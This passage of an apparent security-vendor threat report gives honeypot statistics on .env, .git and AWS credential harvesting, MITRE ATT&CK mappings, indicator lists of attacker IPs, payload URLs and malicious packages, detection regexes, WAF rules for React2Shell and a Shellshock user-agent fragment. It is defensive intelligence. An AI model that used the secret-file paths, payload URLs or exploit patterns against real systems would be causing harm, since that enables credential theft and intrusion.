Target PathEventsRisk Level
/.env229CRITICAL
/api/.env76CRITICAL
/admin/.env62CRITICAL
/backend/.env60CRITICAL
/.env.local58HIGH
/.env.example47MEDIUM
/app/.env33CRITICAL
/core/.env27CRITICAL
/.env.production25CRITICAL
/.env.bak24CRITICAL
/.env.save24CRITICAL
/.env.zip15CRITICAL
/.env.rar15CRITICAL
/.aws/credentials6CRITICAL
Git Repository Exposure

Total Events: 122

Target PathEventsInformation Leaked
/.git/config55Remote URLs, credentials
/.git/index19File structure
/.git/HEAD6Branch information
/admin/.git/config4Admin repo secrets
/api/.git/config4API repo secrets
Top Credential Harvesters
Source IPCountryEventsPrimary Target
78.142.18.135🇷🇺 Russia128.env files
78.153.140.177🇷🇺 Russia119.env files
62.146.234.188🇩🇪 Germany115.env + .git
152.42.188.148🇸🇬 Singapore105.env + .git
178.128.89.216🇸🇬 Singapore105.env + .git
78.153.140.203🇷🇺 Russia101.env files
206.71.149.226🇺🇸 USA99.env files
78.153.140.224🇷🇺 Russia91.env files
78.153.140.179🇷🇺 Russia87AWS credentials
213.209.159.150🇩🇪 Germany19.git repos

Note: 78.153.140.x subnet shows coordinated Russian-nexus scanning with multiple IPs from same /24 block.

Detection Rules
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
# Environment file access
GET.*\.env($|[./\?])
GET.*/\.env\.(local|production|staging|bak|save|old|backup)
GET.*\.env\.(zip|rar|tar\.gz|7z)

# Git exposure
GET.*\/\.git\/(config|index|HEAD|objects|refs)

# AWS credentials
GET.*\/\.aws\/(credentials|config)
GET.*/config/aws_settings

Assessment: Environment file scanning is fully automated and targets both development artifacts (.env.example) and production secrets. The systematic approach to backup file extensions (.bak, .save, .zip) indicates sophisticated tooling. Immediate risk to exposed deployments - attackers can obtain database credentials, API keys, and cloud access tokens.


MITRE ATT&CK Mapping

Execution

Persistence

TechniqueIDObserved In
Browser ExtensionsT1176GhostPoster

Defense Evasion

TechniqueIDObserved In
Obfuscated Files or InformationT1027RUSTRIC, PYTRIC, lotusbail, GhostPoster
Obfuscated Files or Information: SteganographyT1027.003ClickFix, GhostPoster
Signed Binary Proxy ExecutionT1218PYTRIC, APT37 Artemis
Subvert Trust Controls: Code SigningT1553.002MacSync Stealer
Virtualization/Sandbox EvasionT1497DriverFixer0428, MacSync Stealer

Credential Access

TechniqueIDObserved In
Credentials from Password Stores: Credentials from Web BrowsersT1555.003MacSync, Webrat, LummaC2
Credentials from Password Stores: KeychainT1555.001MacSync Stealer
Brute Force: Password GuessingT1110.001Baysec Honeypot (SSH, SMTP AUTH)
Brute Force: Password SprayingT1110.003Baysec Honeypot (SSH, SMB, NTLM)

Lateral Movement

TechniqueIDObserved In
Remote Services: SMB/Windows Admin SharesT1021.002Baysec Honeypot (attackers attempting SMB auth)

Discovery

TechniqueIDObserved In
Software Discovery: Security Software DiscoveryT1518.001RUSTRIC, PYTRIC, DriverFixer0428

Command and Control

TechniqueIDObserved In
Application Layer Protocol: Web ProtocolsT1071.001RUSTRIC, PYTRIC, MacSync, Webrat
Web ServiceT1102APT37 Artemis (Yandex, pCloud), DriverFixer0428 (Dropbox)
Ingress Tool TransferT1105RUSTRIC, PYTRIC, ClickFix

Initial Access

TechniqueIDObserved In
Exploit Public-Facing ApplicationT1190Baysec Honeypot (React2Shell, PHP CGI, Hikvision, SAP NetWeaver, GeoServer, Apache, PHPUnit, Shellshock, OpenWRT)
Phishing: Spearphishing AttachmentT1566.001RUSTRIC, PYTRIC, APT37 Artemis
Phishing: Spearphishing LinkT1566.002RUSTRIC, PYTRIC, Contagious Interview
Supply Chain Compromise: Compromise Software Supply ChainT1195.002lotusbail, GhostPoster, PyPI packages

Reconnaissance

TechniqueIDObserved In
Active Scanning: Vulnerability ScanningT1595.002Baysec Honeypot (Cisco VPN, IoT devices, environment files)
Search Open Technical DatabasesT1596Baysec Honeypot (DNS reconnaissance)

Resource Development

TechniqueIDObserved In
Acquire Infrastructure: Virtual Private ServerT1583.003React2Shell (DigitalOcean scanners), RedTail, Rondo Botnet

Collection

TechniqueIDObserved In
Automated CollectionT1119Baysec Honeypot (environment file harvesting, .git exposure scanning)
Data from Cloud StorageT1530Baysec Honeypot (AWS credentials harvesting attempts)

Indicators of Compromise

Network Indicators

React2Shell (CVE-2025-55182) - Extended IoCs (Dec 17-27, 2025) - 223 events, 26 IPs:

IndicatorCampaignTypeAction
94.154.35.154React2Shell (Actor 1)Staging Server /weball.shBlock at perimeter
193.142.147.209:12323React2Shell (Actor 1)Reverse Shell C2Block egress
5.255.121.141React2Shell (Actor 2)Payload ServerBlock at perimeter
45.154.98.124React2Shell (Actor 2)Scanner (31 events)Block/monitor
95.214.55.246React2ShellPrimary Scanner (78 events)Block/monitor
5.187.35.21React2ShellGo-http-client Scanner (14 events)Block/monitor
130.12.180.207React2ShellScanner (USA)Block/monitor
192.159.99.95React2ShellMulti-vector Scanner (UK)Block/monitor
194.127.199.125React2ShellScanner (Luxembourg)Block/monitor
195.24.237.218React2ShellScanner (Russia)Block/monitor
216.250.122.216React2ShellScanner (USA)Block/monitor
84.234.98.89React2ShellScanner (Sweden)Block/monitor
170.64.136.199React2ShellDigitalOcean ScannerBlock/monitor
170.64.145.146React2ShellDigitalOcean ScannerBlock/monitor
170.64.193.109React2ShellDigitalOcean ScannerBlock/monitor
170.64.204.250React2ShellDigitalOcean ScannerBlock/monitor

RedTail / PHP CGI (CVE-2024-4577) - Extended IoCs (Dec 17-27, 2025) - 1,276 events, 30+ IPs:

IndicatorCampaignTypeAction
178.16.55.224RedTailC2 ServerBlock at perimeter
2001:41d0:601:1100::779bRedTailIPv6 Primary Scanner (162 events)Block/monitor
163.5.148.15RedTailPHP CGI + PHPUnit Scanner (94 events)Block/monitor
62.146.234.188RedTailMulti-vector Scanner (Germany, 72 events)Block/monitor
152.42.188.148RedTailPHP CGI Scanner (Singapore, 66 events)Block/monitor
178.128.89.216RedTailPHP CGI Scanner (Singapore, 66 events)Block/monitor
103.168.91.76RedTailPHPUnit RCE Scanner (47 events)Block/monitor
144.126.203.185RedTailMulti-vector Scanner (USA)Block/monitor
152.69.216.125RedTailPHP CGI Scanner (USA)Block/monitor
157.173.105.78RedTailPHPUnit RCE Scanner (UK)Block/monitor
158.220.81.232RedTailPHP CGI Scanner (Switzerland)Block/monitor
165.154.231.140RedTailMulti-vector Scanner (Canada)Block/monitor
173.249.5.123RedTailMulti-vector Scanner (Germany)Block/monitor
207.244.246.26RedTailPHP CGI Scanner (USA)Block/monitor
216.108.237.50RedTailPHP CGI Scanner (USA)Block/monitor
217.154.69.208RedTailPHPUnit RCE Scanner (UK)Block/monitor
45.192.10.196RedTailPHP CGI Scanner (South Africa)Block/monitor

Rondo Botnet (Mirai Variant) - IoCs:

IndicatorCampaignTypeAction
41.231.37.153Rondo BotnetC2/Payload Server (Tunisia)Block at perimeter
192.159.99.95Rondo BotnetPrimary Scanner (UK)Block/monitor
rondo2012@atomicmail.ioRondo BotnetAttribution markerHunt in logs
http://41.231.37.153/rondo.*.shRondo BotnetPayload URLsBlock at proxy

IoT & Network Device Exploitation - IoCs:

IndicatorCampaignTypeAction
89.42.231.239Hikvision ScannerCVE-2021-36260 (Romania)Block/monitor
89.42.231.244Hikvision ScannerCVE-2021-36260 (Romania)Block/monitor
5.182.209.113Hikvision ScannerCVE-2021-36260 (Luxembourg)Block/monitor
147.124.204.3Apache TraversalCVE-2021-41773 (USA)Block/monitor
87.121.84.181Apache TraversalCVE-2021-41773 (Bulgaria)Block/monitor
103.203.76.79WinRM ScannerRemote Admin (India)Block/monitor
111.92.61.249WinRM ScannerRemote Admin (India)Block/monitor
113.160.1.118WinRM ScannerRemote Admin (Vietnam)Block/monitor
114.143.212.195WinRM ScannerRemote Admin (India)Block/monitor

Cisco VPN (AnyConnect) Probing - IoCs (73 events, 19 DigitalOcean IPs):

IndicatorCampaignTypeAction
104.248.12.12Cisco VPNDigitalOcean ScannerMonitor
137.184.178.219Cisco VPNDigitalOcean ScannerMonitor
137.184.254.136Cisco VPNDigitalOcean ScannerMonitor
137.184.26.12Cisco VPNDigitalOcean ScannerMonitor
138.68.141.22Cisco VPNDigitalOcean ScannerMonitor
147.182.254.157Cisco VPNDigitalOcean ScannerMonitor
159.223.107.241Cisco VPNDigitalOcean ScannerMonitor
162.243.96.90Cisco VPNDigitalOcean ScannerMonitor
170.64.138.231Cisco VPNDigitalOcean ScannerMonitor

Environment & Secrets Harvesting - IoCs (360 events):

IndicatorCampaignTypeAction
78.153.140.179Env Harvesting.env Scanner (Russia, 118 events)Block/monitor
78.153.140.224Env Harvesting.env Scanner (Russia, 37 events)Block/monitor
139.162.8.26Env Harvesting.env Scanner (35 events)Block/monitor
78.153.140.151Env Harvesting.env Scanner (Russia, 27 events)Block/monitor
213.209.159.150Git Exposure.git Scanner (Germany, 19 events)Block/monitor
45.148.10.23Env Harvesting.env Scanner (16 events)Block/monitor
78.153.140.203Env Harvesting.env Scanner (Russia)Block/monitor
185.241.208.170Env Harvesting.env ScannerBlock/monitor
80.94.95.98Env Harvesting.env ScannerBlock/monitor

SSH Brute Force - Top Attackers (395K+ events):

IndicatorCampaignTypeAction
34.29.105.211SSH Brute ForcePrimary attacker (122K events)Block at perimeter
195.178.110.30SSH Brute Force7.4K eventsBlock/monitor
92.118.39.62SSH Brute Force6.5K eventsBlock/monitor
80.94.92.40SSH Brute Force6.4K eventsBlock/monitor
91.92.241.148SSH Brute Force6.1K eventsBlock/monitor

SMTP Open Relay Probing - 2,600 events:

IndicatorCampaignTypeAction
103.39.64.54SMTP AbusePrimary relay scanner (1K events)Block at perimeter
45.144.212.19SMTP AbuseRelay scanner (1K events)Block at perimeter
45.144.212.238SMTP AbuseRelay probing (66 events)Block/monitor
78.153.140.207SMTP AbuseOpen relay test emails to siagabaja.comBlock/monitor
87.251.78.220SMTP AbuseRelay probing (17 events)Block/monitor
158.94.209.3SMTP AbuseWindows host WIN-7N1FIECL6ICBlock/monitor

DNS Reconnaissance - 1,355 events:

IndicatorCampaignTypeAction
141.98.83.48DNS ReconPrimary scanner (808 events)Block/monitor
176.65.134.118DNS ReconTXT/A record probing (75 events)Block/monitor
206.191.154.44DNS ReconDNS enumeration (62 events)Block/monitor
87.121.84.13DNS ReconDNS probing (33 events)Block/monitor
192.210.187.83DNS ReconDNS enumeration (28 events)Block/monitor

Other Campaigns:

IndicatorCampaignTypeAction
141.98.80.175ClickFixC2 ServerBlock at perimeter
zkcall.netMacSync StealerDistributionBlock at DNS/proxy
Yandex Cloud: tanessha.samuelAPT37 ArtemisC2 AccountMonitor for connections
pCloud: tanessha.samuelAPT37 ArtemisC2 AccountMonitor for connections
113.160.186.2Hospital SMB ScanningCompromised HostBlock at perimeter
78.153.140.179Credential HarvestingScannerBlock at perimeter
78.153.140.224Credential HarvestingScannerBlock at perimeter
188.237.58.92Protocol AttacksScannerBlock at perimeter
103.39.64.54SMTP Brute ForceScannerBlock at perimeter
45.144.212.19SMTP Brute ForceScannerBlock at perimeter
87.251.78.220SMTP Phishing DistributionPhishing InfraBlock at perimeter
102.211.42.66SMTP Phishing DistributionPhishing InfraBlock at perimeter

Email/Sender Indicators (Phishing)

IndicatorCampaignTypeAction
accounts@globalfinancesolutions.comFinancial PhishingSenderBlock/flag in email gateway
office@cryptoyieldx.comCrypto ScamSenderBlock/flag in email gateway
dpr@priv8shop.comUnknown CampaignSenderBlock/flag in email gateway

User-Agent Signatures

User-AgentCampaignEventsAction
libredtail-httpRedTail/PHP CGI574Block at WAF/proxy
Mozilla/5.0 (rondo2012@atomicmail.io)Rondo Botnet122Block at WAF/proxy
() { :; }; ...Rondo (Shellshock)27Block at WAF/proxy
Python WinRM clientWinRM Exploitation70Block/monitor
Go-http-client/1.1React2Shell, Scanning380Monitor (context-dependent)
Mozilla/5.0 zgrab/0.xZGrab Scanner109Monitor (research tool)
Mozilla/5.0 (compatible; Scanner/1.0)Generic Scanner100Monitor
chrome/1.2.3Malicious Scanner16Block
xfa1 / xfa1,nvdorz,nvd0rzSuspicious Scanner37Block
cypex.ai/scanningCYPEX Scanner194Monitor (commercial)
Assetnote/1.0.0Assetnote Scanner40Monitor (commercial)
l9scan/2.0LeakIX Scanner35Monitor (research)

URL Indicators

IndicatorCampaignTypeAction
http://94.154.35.154/weball.shReact2ShellStaging URLBlock at proxy
https://178.16.55.224/shRedTailPayload URLBlock at proxy

File Indicators

IndicatorCampaignTypeAction
rasmanesc.exeWebratDropperDetect/block
version.dll (side-loaded)APT37 ArtemisMalicious DLLDetect side-loading
zk-call-messenger-installer-3.9.2-lts.dmgMacSync StealerInstallerBlock
weball.shReact2ShellPost-exploit payloadDetect/block
/tmp/x.shReact2ShellStaged scriptHunt on endpoints

Malicious Packages

RegistryPackage NameCampaignAction
npmlotusbailWhatsApp StealerRemove; unlink WhatsApp devices
PyPIsmtrlibTelegram StealerRemove
PyPIruntimeutilsInfostealerRemove
PyPIai-cypherInfostealerRemove
PyPIunizipInfostealerRemove

Browser Extensions (GhostPoster)

Remove and reset passwords if installed:

  • Free VPN Forever
  • screenshot-saved-easy
  • weather-best-forecast
  • google-translate-pro-extension
  • dark-reader-for-ff

Recommendations

Immediate Actions

PriorityActionDetails
CRITICALPatch SAP NetWeaverCVE-2025-31324 - CVSS 10.0, unauthenticated file upload
CRITICALPatch n8nCVE-2025-68613 - 103K+ exposed instances. Upgrade to 1.120.4+
CRITICALPatch PHPCVE-2024-4577 - EPSS 94.37%. Upgrade to 8.1.29+/8.2.20+/8.3.8+
CRITICALPatch Next.js/RSCCVE-2025-55182 - Actively exploited with confirmed C2
CRITICALPatch ApacheCVE-2021-41773 - 402 attempts. Upgrade Apache 2.4.49/2.4.50
HIGHPatch HikvisionCVE-2021-36260 - 103 attempts. Update camera firmware
HIGHBlock C2sSee Indicators of Compromise for full blocklist
HIGHAudit npm/PyPIRemove lotusbail (unlink WhatsApp devices), smtrlib, runtimeutils
HIGHRemove extensionsGhostPoster Firefox extensions (17 total)
MEDIUMBlock User-Agentlibredtail-http (RedTail fingerprint)
MEDIUMAudit Docker APIsRestrict to authenticated access only

Detection Signatures

WAF/IDS Rules (React2Shell CVE-2025-55182):

1
2
3
Block if:
  HTTP POST AND
  Body matches /(\$1:__proto__:then|\$1:constructor:constructor|process\.mainModule)/

HTTP Header Indicators (React2Shell):

HeaderValueConfidence
Next-Actionx or 1MEDIUM

Path-Based Detection (WAF/IDS):

1
2
3
4
5
.*\.env.*
.*eval-stdin\.php.*
.*think\\app.*invokefunction.*
.*pearcmd.*
.*allow_url_include.*

Hunt Queries:

  • File: /tmp/x.sh, weball.sh on web servers
  • User-Agent: libredtail-http
  • Connections to: 94.154.35.154, 193.142.147.209:12323

Network IOCs (Quick Block List):

1
2
3
4
5
6
7
8
94.154.35.154       # React2Shell staging
193.142.147.209     # React2Shell C2 (port 12323)
178.16.55.224       # RedTail C2
163.5.148.15        # RedTail scanner
141.98.80.175       # ClickFix C2
zkcall.net          # MacSync distribution
103.39.64.54        # SMTP brute force
87.251.78.220       # SMTP phishing

Assessment Confidence Levels

AssessmentConfidenceBasis
Webrat campaign attribution (criminal)HIGHKaspersky analysis; consistent TTPs with financially-motivated actors
APT37 Artemis attribution (DPRK)HIGHGenians analysis; infrastructure overlap; historical APT37 TTPs
Contagious Interview attribution (DPRK)HIGHFBI action; MITRE ATT&CK group documentation; historical patterns
CVE-2025-68613 exposure countHIGHCensys scan data (Dec 22 2025)
ClickFix campaign active statusMEDIUMSome infrastructure disrupted by Operation Endgame; likely to reconstitute
MacSync Stealer mitigatedMEDIUMApple revoked certificate; operators may obtain new signing

Conclusion

Key Judgments:

  1. Supply chain is the primary attack vector for targeting developers and security professionals. npm, PyPI, and browser extension stores require continuous monitoring.

  2. Steganography has become mainstream in criminal operations. Multiple independent campaigns (ClickFix, GhostPoster) adopted image-based payload delivery within the same period.

  3. Code signing provides insufficient trust. Threat actors use signed and notarized macOS applications to bypass Gatekeeper, rendering signature-only trust models obsolete.

  4. Developer targeting is strategic, not opportunistic. Webrat operators deliberately pivoted from game cheats to fake exploit repositories, recognizing the higher value of security researcher credentials.

  5. State-sponsored actors remain active. Both APT37 (Artemis) and Contagious Interview demonstrate North Korean continued focus on credential theft and intelligence gathering.

  6. Legacy vulnerabilities remain actively exploited. Baysec honeypots captured mass scanning for Shellshock (CVE-2014-6271), PHPUnit RCE (CVE-2017-9841), and Apache path traversal (CVE-2021-41773) - vulnerabilities years old but still profitable for attackers.

  7. Geographic threat concentration persists. Russia (1.1M+ events) and Egypt (2.4M+ events) remain dominant sources of credential harvesting and brute force attacks, with captured credentials revealing compromised enterprise infrastructure.

Bottom Line: The boundary between “legitimate” open-source platforms and malware distribution has effectively dissolved. Defenders must extend monitoring to developer ecosystems and treat GitHub, npm, PyPI, and browser stores as potential attack vectors with the same rigor applied to traditional threat sources. Additionally, patching legacy vulnerabilities remains critical - attackers continue exploiting years-old CVEs at scale.


References

Closed Source Intelligence

Baysec CTI - proprietary threat intelligence platform providing real-time ransomware tracking, leak site monitoring, dark web surveillance, and credential exposure detection.

Baysec Intelligence AI - AI-assisted analysis for report enrichment, IOC correlation, and threat actor attribution.

Baysec Sensors - Distributed honeypot network capturing SSH/SMB/RDP/MSSQL/SMTP/DNS attacks, credential harvesting attempts, phishing distribution attempts, and exploit delivery.


Open Source Intelligence (OSINT)

Threat Research Reports

TopicSourceLink
Webrat via fake GitHub exploitsKaspersky/Securelistsecurelist.com
Webrat GitHub analysisBleepingComputerbleepingcomputer.com
ClickFix steganographyHuntresshuntress.com
ClickFix fake updatesMalwarebytesmalwarebytes.com
GhostPoster Firefox extensionsThe Hacker Newsthehackernews.com
GhostPoster steganographyBleepingComputerbleepingcomputer.com
lotusbail npm packageSecurityWeeksecurityweek.com
lotusbail WhatsApp theftBleepingComputerbleepingcomputer.com
MacSync Stealer evolutionJamf Threat Labsjamf.com
MacSync signed malwareSecurityWeeksecurityweek.com
APT37 Artemis campaignGeniansgenians.co.kr
DriverFixer0428 (DPRK)LunchM0n3ylunchm0n3y.com
n8n CVE-2025-68613The Hacker Newsthehackernews.com
Contagious Interview (FBI)Infosecurity Magazineinfosecurity-magazine.com
Operation EndgameEuropoleuropol.europa.eu

Vulnerabilities

CVE IdentifierDescriptionLink
CVE-2025-68613n8n RCE (CVSS 9.9)nvd.nist.gov
CVE-2025-55182React Server Components RCEnvd.nist.gov
CVE-2025-31324SAP NetWeaver File Upload (CVSS 10.0)nvd.nist.gov
CVE-2024-4577PHP CGI Argument Injectionnvd.nist.gov
CVE-2024-36401GeoServer OGC Filter RCEnvd.nist.gov
CVE-2024-21899QNAP NAS Authentication Bypassnvd.nist.gov
CVE-2023-44487HTTP/2 Rapid Reset DoSnvd.nist.gov
CVE-2023-1389TP-Link Archer Command Injectionnvd.nist.gov
CVE-2021-41773Apache HTTP Server Path Traversalnvd.nist.gov
CVE-2021-42013Apache HTTP Server Path Traversalnvd.nist.gov
CVE-2021-36260Hikvision Command Injectionnvd.nist.gov
CVE-2021-35395Realtek SDK Buffer Overflownvd.nist.gov
CVE-2020-3452Cisco ASA/FTD Path Traversalnvd.nist.gov
CVE-2020-0796SMBGhost RCEnvd.nist.gov
CVE-2019-20933InfluxDB Authentication Bypassnvd.nist.gov
CVE-2019-16278Nostromo nhttpd RCEnvd.nist.gov
CVE-2018-20062ThinkPHP RCEnvd.nist.gov
CVE-2017-9841PHPUnit RCEnvd.nist.gov
CVE-2016-1555Netgear Command Injectionnvd.nist.gov
CVE-2014-6271Shellshock (Bash RCE)nvd.nist.gov
CISA KEV CatalogKnown Exploited Vulnerabilitiescisa.gov